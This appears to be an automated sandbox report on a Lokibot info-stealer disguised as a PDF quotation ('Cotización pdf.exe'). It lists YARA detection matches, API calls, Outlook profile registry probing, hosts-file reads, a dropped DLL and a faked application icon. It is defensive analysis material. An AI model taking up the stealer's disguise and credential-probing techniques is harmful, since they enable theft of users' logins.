Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Code function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_00403225

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_0040604C	0_2_0040604C
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_00404772	0_2_00404772
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 1_2_0040549C	1_2_0040549C
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 1_2_004029D4	1_2_004029D4

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: String function: 00405B6F appears 42 times

Source: Cotizaci#U00f3npdf.exe, 00000000.00000003.247002262.0000000003196000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Cotizaci#U00f3npdf.exe
Source: Cotizaci#U00f3npdf.exe, 00000000.00000003.242779199.000000000332F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Cotizaci#U00f3npdf.exe

Source: Cotizaci#U00f3npdf.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Cotizaci#U00f3npdf.exe

Virustotal: Detection: 25%

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

File read: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Jump to behavior

Source: Cotizaci#U00f3npdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe"
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process created: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe"
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process created: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Code function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

1_2_0040650A

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsc114E.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/6@59/2

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Code function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,

0_2_00402012

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Code function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404275

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: Cotizaci#U00f3npdf.exe, 00000000.00000003.246790418.0000000003080000.00000004.00000001.sdmp, Cotizaci#U00f3npdf.exe, 00000000.00000003.247093932.0000000003210000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Cotizaci#U00f3npdf.exe, 00000000.00000003.246790418.0000000003080000.00000004.00000001.sdmp, Cotizaci#U00f3npdf.exe, 00000000.00000003.247093932.0000000003210000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected aPLib compressed binary

Show sources

Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2512, type: MEMORYSTR

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_73321000 push eax; ret	0_2_7332102E
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 1_2_00402AC0 push eax; ret	1_2_00402AD4
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 1_2_00402AC0 push eax; ret	1_2_00402AFC

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Code function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405DA3

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsc1150.tmp\tjbqk.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Show sources

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (27).png

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
